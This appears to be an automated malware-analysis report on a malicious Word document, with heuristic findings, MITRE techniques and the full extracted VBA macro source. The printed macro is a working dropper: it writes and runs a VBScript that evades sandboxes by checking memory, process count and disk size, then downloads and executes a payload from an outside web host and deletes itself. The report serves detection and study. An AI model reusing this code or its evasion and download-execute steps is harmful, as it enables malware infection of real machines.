Verdict: MALICIOUS
Risk Score: 390

Malware Insights

MITRE ATT&CK

- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File
The sample is a malicious Office document containing obfuscated VBA macros. The Document_Close subroutine writes a VBScript file named 'HelpCenter.vbs' to the user's Documents folder and runs it with wscript.exe. The generated script checks for specific computer names and machine characteristics before downloading and executing further content, indicating downloader or dropper functionality.
Heuristics (10)

- VBA project inside OOXML (medium, 8 related findings) OOXML_VBA: Document contains a VBA project — VBA macros present.
- WScript.Shell usage (critical) OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script: `hwiqfhssaqE.Write "Set objShell = WScript.CreateObject(""WScript.Shell"")" & vbCrLf`
- LOLBin reference in VBA (critical) OLE_VBA_LOLBIN: LOLBin reference in VBA. Matched line in script: `Result = "wscript.exe " & Chr(34) & qs & Chr(34)`
- Obfuscated VBA Shell command with URL (critical) OLE_VBA_OBFUSCATED_SHELL_URL: VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own. Matched line in script: `hwiqfhssaqE.Write "Set objShell = WScript.CreateObject(""WScript.Shell"")" & vbCrLf`
- VBA downloads and writes a file to disk (critical) OLE_VBA_HTTP_DROP_EXEC: VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script: `hwiqfhssaqE.Write ".write xHttp.responseBody" & vbCrLf`
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: `Set nbhx28yw = CreateObject("Scripting.FileSystemObject")`
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call. Matched line in script: `hwiqfhssaqE.Write "Set objWMIService = GetObject(""winmgmts:\\"" & strComputer & ""\root\cimv2"")" & vbCrLf`
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low) OLE_VBA_ENVIRON: Environ() call (env variable access). Matched line in script: `hwiqfqqE = Environ("USERPROFILE") + "\Documents"`
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels indicate which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4810 bytes | 2de5fb4e7598c3cc5b69717959ab4305d4744d0adc7efc643dc07d34ee4f16b0 |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 14848 bytes | ca994a44001bd28a5f1efa9b3fe2633098980c67af079d79d7817cbf8e0be322 |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Rem Attribute VBA_ModuleType=VBADocumentModule
Private Sub Document_Close()
On Error Resume Next
Dim wipsirdx
Dim nbhx28yw
Dim hwiqfqqE
Set nbhx28yw = CreateObject("Scripting.FileSystemObject")
hwiqfqqE = Environ("USERPROFILE") + "\Documents"
If Not nbhx28yw.FileExists(Environ("USERPROFILE") + "\Documents\" + "tLLsm4W2.txt") Then
If Not nbhx28yw.FolderExists(hwiqfqqE) Then nbhx28yw.CreateFolder (hwiqfqqE)
qs = hwiqfqqE + "\HelpCenter.vbs"
Dim hwiqfhssaqE As Object
Set hwiqfhssaqE = nbhx28yw.CreateTextFile(qs, True, True)
hwiqfhssaqE.Write "strComputer = "".""" & vbCrLf
hwiqfhssaqE.Write "Set objWMIService = GetObject(""winmgmts:\\"" & strComputer & ""\root\cimv2"")" & vbCrLf
hwiqfhssaqE.Write "Set colItems = objWMIService.ExecQuery(""Select * from Win32_OperatingSystem"", , 48)" & vbCrLf
hwiqfhssaqE.Write "For Each objItem In colItems" & vbCrLf
hwiqfhssaqE.Write "named = objItem.CSName" & vbCrLf
hwiqfhssaqE.Write "numbproc = objItem.NumberOfProcesses" & vbCrLf
hwiqfhssaqE.Write "memory = objItem.TotalVisibleMemorySize" & vbCrLf
hwiqfhssaqE.Write "sArray = Array(""DESKTOP-DN3JK31"", ""DESKTOP-D"", ""DESKTOP-D2231"")" & vbCrLf
hwiqfhssaqE.Write "sFind = named" & vbCrLf
hwiqfhssaqE.Write "s = Join(sArray, ""|"")" & vbCrLf
hwiqfhssaqE.Write "If InStr(1, s, sFind, vbTextCompare) Then" & vbCrLf
'hwiqfhssaqE.Write "MsgBox ""yep""" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf
hwiqfhssaqE.Write "Next" & vbCrLf
hwiqfhssaqE.Write "If memory < 4000000 Then" & vbCrLf
hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
'hwiqfhssaqE.Write "MsgBox "">4gb""" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf
hwiqfhssaqE.Write "If numbproc < 28 Then" & vbCrLf
hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
'hwiqfhssaqE.Write "MsgBox "">28""" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf
hwiqfhssaqE.Write "strComputer = "".""" & vbCrLf
hwiqfhssaqE.Write "Set objWMIService = GetObject(""winmgmts:\\"" & strComputer & ""\root\cimv2"")" & vbCrLf
hwiqfhssaqE.Write "Set colItems = objWMIService.ExecQuery(""Select * from Win32_DiskDrive"", , 48)" & vbCrLf
hwiqfhssaqE.Write "For Each objItem In colItems" & vbCrLf
hwiqfhssaqE.Write "disksize = objItem.Size" & vbCrLf
hwiqfhssaqE.Write "If disksize < 60000000000 Then" & vbCrLf
hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
'hwiqfhssaqE.Write "MsgBox "">60gb""" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf
hwiqfhssaqE.Write "Next" & vbCrLf
'hwiqfhssaqE.Write "End Sub" & vbCrLf
hwiqfhssaqE.Write "Dim xHttp: Set xHttp = CreateObject(""microsoft.xmlhttp"")" & vbCrLf
hwiqfhssaqE.Write "Dim bStrm: Set bStrm = CreateObject(""Adodb.Stream"")" & vbCrLf
hwiqfhssaqE.Write "xHttp.Open ""GET"", ""https://crabbier-airports.000webhostapp.com/index66.html"", False" & vbCrLf
hwiqfhssaqE.Write "xHttp.Send" & vbCrLf
hwiqfhssaqE.Write "With bStrm" & vbCrLf
hwiqfhssaqE.Write ".Type = 1" & vbCrLf
hwiqfhssaqE.Write ".Open" & vbCrLf
hwiqfhssaqE.Write ".write xHttp.responseBody" & vbCrLf
hwiqfhssaqE.Write ".savetofile ""putty.vbs"", 2 " & vbCrLf
hwiqfhssaqE.Write "End With" & vbCrLf
hwiqfhssaqE.Write "Set objShell = WScript.CreateObject(""WScript.Shell"")" & vbCrLf
hwiqfhssaqE.Write "objShell.Run (""putty.vbs"")" & vbCrLf
hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
hwiqfhssaqE.Close
Set wipsirdx = CreateObject("WScript.Shell")
Result = "wscript.exe " & Chr(34) & qs & Chr(34)
wipsirdx.Run Result, 1, True
Set mFSO = CreateObject("Scripting.FileSystemObject")
Call mFSO.DeleteFile(Wscript.ScriptFullName, True)
Wscript.Quit
End If
End Sub
```